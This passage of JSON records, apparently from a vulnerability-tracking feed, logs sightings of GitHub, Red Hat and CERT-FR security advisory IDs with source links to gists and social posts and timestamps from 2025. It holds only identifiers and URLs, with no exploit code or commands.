"https://gist.github.com/puerco/0e45f7acdb725a96b024bfea9e9225de", "content": "", "creation_timestamp": "2025-07-28T21:50:46.000000Z"}, {"uuid": "5b9c977a-a563-48dc-bf8a-1291e202733f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qxp5-gwg8-xv66", "type": "seen", "source": "https://gist.github.com/puerco/0e45f7acdb725a96b024bfea9e9225de", "content": "", "creation_timestamp": "2025-07-28T21:50:46.000000Z"}, {"uuid": "8fec28b9-b8f4-4bed-8d73-ada696beede6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5qj-9vmx-7g6g", "type": "seen", "source": "https://gist.github.com/konard/59299c7a612be7a27ce4cee24019182d", "content": "", "creation_timestamp": "2025-10-26T10:42:38.000000Z"}, {"uuid": "1d8b75c6-d612-4988-843c-396e1ae1c551", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/cec688f292a03e3b2796a0be6df7b474", "content": "", "creation_timestamp": "2025-07-16T20:21:15.000000Z"}, {"uuid": "61eebf61-b7d1-4e66-8bc7-8c642693b0cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/cec688f292a03e3b2796a0be6df7b474", "content": "", "creation_timestamp": "2025-07-16T20:21:15.000000Z"}, {"uuid": "46706f01-8c04-40bd-b8e7-51196776b7ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "811da351-294f-4514-ac50-9d51b988bae5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "d6c886a7-2ecd-4fb2-8055-3649b389bf10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "3048d74f-47b4-4c4b-a581-cc8dbf99b1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "8f5e5e4b-f3bc-4771-9c19-825dce7de2b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "45cc8b50-ae1d-4d31-ba66-a4d8ce51e998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "d12688ec-6962-45a7-84f4-ee8ca1bceb07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/9fa030c74745f11463c8c02a5d457e2f", "content": "", "creation_timestamp": "2025-07-16T20:21:47.000000Z"}, {"uuid": "1a06ac51-0ff4-4748-9d2e-2726cbd7b6be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/942fa1d0ba7b5569cc954ae87ffec38e", "content": "", "creation_timestamp": "2025-07-16T20:28:13.000000Z"}, {"uuid": "0f39624c-d430-4658-8c3b-444479ec4112", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2630f38f0cf51f0ad5c10758caa6685c", "content": "", "creation_timestamp": "2025-07-16T20:29:48.000000Z"}, {"uuid": "b6ac7fa4-46ac-48a7-9652-fc87820542d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/a2cf93e8a7c890ab2c6de79eba9bf685", "content": "", "creation_timestamp": "2025-07-16T21:29:46.000000Z"}, {"uuid": "53bf9756-8b5d-4aac-8345-c22a46405e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/7b141323240101b8d039927be68ec0a4", "content": "", "creation_timestamp": "2025-07-16T21:29:15.000000Z"}, {"uuid": "a92074ac-31ea-4915-bd09-6b61c0fe3723", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/7b141323240101b8d039927be68ec0a4", "content": "", "creation_timestamp": "2025-07-16T21:29:15.000000Z"}, {"uuid": "e226307e-5fc4-4747-9c03-e96d38daaadb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "55de468b-872e-4505-9603-903597df2bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jcwr-x25h-x5fh", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "5ce73104-9e33-4997-b8ee-14d9c21de45e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g6ph-x5wf-g337", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "36f0546b-f5ef-4a6a-96fe-8ad2c41aa0c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "b4e201f8-a432-4538-bfd7-d6f4e580ea58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "cd03bdd5-3348-44ce-9dc6-792f2cfca401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "3004beb4-9b3a-44c5-b982-5b347437b34a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rhgr-952r-6p8q", "type": "seen", "source": "https://gist.github.com/safer-bot/e10d47c87155ab945335c81dc8c487e3", "content": "", "creation_timestamp": "2025-07-16T21:36:12.000000Z"}, {"uuid": "ce708dec-4948-4cb0-8308-562bab831560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e88b278089be24ffeaf58aa058ecd3bc", "content": "", "creation_timestamp": "2025-07-16T21:35:41.000000Z"}, {"uuid": "267caa5c-9aae-4807-96b9-a04b18716266", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vrpq-qp53-qv56", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "e34fecc9-de06-4858-9272-187025fe3efe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "78ceca61-fb26-41d7-b85b-1573de161847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "c1ae0743-4ec3-46d5-98b6-2bd9eebd61ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "a200ed3c-6741-461c-8cd6-599f30c2c976", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "1062612f-d06a-49c8-a6df-3d9362e8941d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "5e372569-7afa-4c1c-a128-abebc9e15832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "2985ec07-8bc3-4f5a-83b9-88311a0d9146", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3p86-9955-h393", "type": "seen", "source": "https://gist.github.com/safer-bot/482e39eebe6fb0eb5161310464d0313c", "content": "", "creation_timestamp": "2025-07-16T21:40:14.000000Z"}, {"uuid": "3ecb1c7d-9c38-449f-b5e4-16c0c6e165cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/95fdb5d981ca08a285e4bad92aa43e92", "content": "", "creation_timestamp": "2025-07-16T21:48:43.000000Z"}, {"uuid": "693a360c-46fe-4d47-a10e-644984f5f601", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/95fdb5d981ca08a285e4bad92aa43e92", "content": "", "creation_timestamp": "2025-07-16T21:48:43.000000Z"}, {"uuid": "f1e4fe83-9bce-42ae-866c-7215b30be91d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/95fdb5d981ca08a285e4bad92aa43e92", "content": "", "creation_timestamp": "2025-07-16T21:48:43.000000Z"}, {"uuid": "b423ceba-ba41-4a4a-b752-023102a9cc06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/95fdb5d981ca08a285e4bad92aa43e92", "content": "", "creation_timestamp": "2025-07-16T21:48:43.000000Z"}, {"uuid": "8978b2ed-484a-451c-90fa-9875c42048a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jq9-2xhw-jpx7", "type": "seen", "source": "https://gist.github.com/safer-bot/2f5aa3fa9820802a0b26be819c5be370", "content": "", "creation_timestamp": "2025-07-16T21:50:49.000000Z"}, {"uuid": "2fee7f97-cf7e-4f35-b369-6d1164107c50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2f5aa3fa9820802a0b26be819c5be370", "content": "", "creation_timestamp": "2025-07-16T21:50:49.000000Z"}, {"uuid": "66881ac6-9342-437b-8302-db09a6117ceb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vqj-43w4-2q58", "type": "seen", "source": "https://gist.github.com/safer-bot/2f5aa3fa9820802a0b26be819c5be370", "content": "", "creation_timestamp": "2025-07-16T21:50:49.000000Z"}, {"uuid": "633847a0-0a2c-4df8-9081-b8f9b08cfa0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wrvw-hg22-4m67", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "e00fe09a-a225-49f9-8fa0-2654fe338642", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "f812e768-1eae-4bca-93da-c9903d60a067", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-77rm-9x9h-xj3g", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "f87187bf-e83f-4981-a58d-f83ab74dd5e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p53j-g8pw-4w5f", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "ff2c6e7b-f96c-47e0-9b38-aaad48a5881a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gg5-vx3j-xwc7", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "c5a7ad37-be08-43fb-8f55-245bbe719e7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5ww-5jh7-63cx", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "4fe6854e-aa57-4bea-b46c-5a83f87126c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h4h5-3hr4-j3g2", "type": "seen", "source": "https://gist.github.com/safer-bot/8aa1733ed034b2a8dd4bd7cad5e66346", "content": "", "creation_timestamp": "2025-07-16T21:53:54.000000Z"}, {"uuid": "7962f398-a4ec-4753-96e5-2235f60c612f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/9c265446e5e207a36b329e04691c1dba", "content": "", "creation_timestamp": "2025-07-16T21:56:13.000000Z"}, {"uuid": "b3b1d63d-741b-4894-b41e-8d9d44d38b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/2abe6df495a93a36f0dc7cd103df0126", "content": "", "creation_timestamp": "2025-07-16T22:00:20.000000Z"}, {"uuid": "c8c5d787-fe2f-4b1f-9c49-603846560d7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/7215b6593f697d4379c3c648b1abc023", "content": "", "creation_timestamp": "2025-07-16T21:59:48.000000Z"}, {"uuid": "95622914-41c0-4b2a-bd2f-d6406d4c5411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/7215b6593f697d4379c3c648b1abc023", "content": "", "creation_timestamp": "2025-07-16T21:59:48.000000Z"}, {"uuid": "6cbc1195-bc52-4d11-94fe-40bfd4de3e88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "ab72ffa3-81ba-43b5-9d0d-60e88b22edce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-h46c-h94j-95f3", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "99aa968d-3aa9-48da-86eb-080bcfadbb0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3x8x-79m2-3w2w", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "d433a90f-6ad8-4173-b751-4af5275a6cf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wf8f-6423-gfxg", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "6875c213-8822-4ae4-8d64-a37a427d2403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "ea483f40-8288-4077-9ef7-15de3c891d47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-57j2-w4cx-62h2", "type": "seen", "source": "https://gist.github.com/safer-bot/44c4fe3a2a44db2b7f362d9d61383dbb", "content": "", "creation_timestamp": "2025-07-16T21:59:18.000000Z"}, {"uuid": "edf0115c-cd61-4e72-8062-0ad98c54fa74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-j827-6rgf-9629", "type": "seen", "source": "https://gist.github.com/Wbaker7702/53198661ba029cb1af08a9ce551dbeb5", "content": "", "creation_timestamp": "2025-10-14T05:07:38.000000Z"}, {"uuid": "eff1054a-f023-46db-b0a7-ae8929252b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64vr-g452-qvp3", "type": "seen", "source": "https://gist.github.com/Wbaker7702/53198661ba029cb1af08a9ce551dbeb5", "content": "", "creation_timestamp": "2025-10-14T05:07:38.000000Z"}, {"uuid": "ffc617f1-8bd6-487e-96f4-e497e3b9a090", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6c5p-vqrh-h6fp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/115544218234442862", "content": "", "creation_timestamp": "2025-11-13T20:14:14.027398Z"}, {"uuid": "cb2d5b0e-4cb7-4418-b7eb-16374f972bec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4vvj-4cpr-p986", "type": "seen", "source": "https://gist.github.com/Wbaker7702/53198661ba029cb1af08a9ce551dbeb5", "content": "", "creation_timestamp": "2025-10-14T05:07:38.000000Z"}, {"uuid": "ae537f97-924d-4563-9ed5-dfc0a94543a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-535g-qp2c-h7vp", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114874903049012115", "content": "", "creation_timestamp": "2025-07-18T15:18:35.098789Z"}, {"uuid": "0bfdd248-e997-4ed5-a4e3-d44b72c04997", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vf9j-h32g-2764", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114875043059847255", "content": "", "creation_timestamp": "2025-07-18T15:54:11.411709Z"}, {"uuid": "9d36faf3-dde4-4cdc-be5d-16e22a0cd379", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fjxv-7rqg-78g4", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114875246100963364", "content": "", "creation_timestamp": "2025-07-18T16:45:49.587903Z"}, {"uuid": "635d1eb6-4794-4a1f-91db-c84135bafece", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8906", "type": "seen", "source": "https://gist.github.com/rcy/48e679544bf1de403b110aa208fb64b0", "content": "", "creation_timestamp": "2025-07-19T21:19:23.000000Z"}, {"uuid": "705077a5-ddb9-429a-bd94-7ecb51243414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-012", "type": "patched", "source": "", "content": "", "creation_timestamp": "2025-12-05T10:11:20.887496Z"}, {"uuid": "0ab9d5a4-1ed9-43c3-9298-58ad65ae6e43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-010", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114890832342268921", "content": "", "creation_timestamp": "2025-07-21T10:49:38.070036Z"}, {"uuid": "a5735b60-bd4e-4dc4-85ce-2216450fa977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-010", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3luhutcpmuy22", "content": "", "creation_timestamp": "2025-07-21T11:22:58.256932Z"}, {"uuid": "ddc162df-e45e-4757-9685-e3657999bf00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-030", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3luibgnek2y2r", "content": "", "creation_timestamp": "2025-07-21T15:08:30.851127Z"}, {"uuid": "23f44925-bb27-43c5-932f-810135ea271b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-030", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114891850304807565", "content": "", "creation_timestamp": "2025-07-21T15:08:31.114263Z"}, {"uuid": "853cc9a3-bda2-4d45-b16e-583b03a88ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-030", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3luicfqc6a52h", "content": "", "creation_timestamp": "2025-07-21T15:25:54.034240Z"}, {"uuid": "b93fd5da-6496-4d11-9b81-d2c21e73ff93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 